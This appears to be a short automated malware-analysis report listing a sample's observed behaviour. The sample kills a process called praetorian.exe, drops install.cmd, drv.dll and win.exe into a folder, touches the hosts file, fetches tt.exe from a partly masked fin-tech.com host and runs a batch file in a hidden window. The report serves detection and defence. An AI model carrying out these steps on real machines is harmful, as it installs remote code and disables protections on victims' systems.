Technical Information
- '%WINDIR%\syswow64\taskkill.exe' /im "praetorian.exe"
- C:\новая папка\install.cmd
- C:\новая папка\drv.dll
- C:\новая папка\win.exe
- <DRIVERS>\etc\hosts
- DNS ASK pm####.fin-tech.com
- ClassName: '' WindowName: ''
- 'C:\новая папка\win.exe' http://pm####.fin-tech.com/tt.exe
- '%WINDIR%\syswow64\cmd.exe' /c ""C:\Новая папка\install.cmd" "' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c ""C:\Новая папка\install.cmd" "
- '%WINDIR%\syswow64\tasklist.exe'
- '%WINDIR%\syswow64\find.exe' /i "win.exe"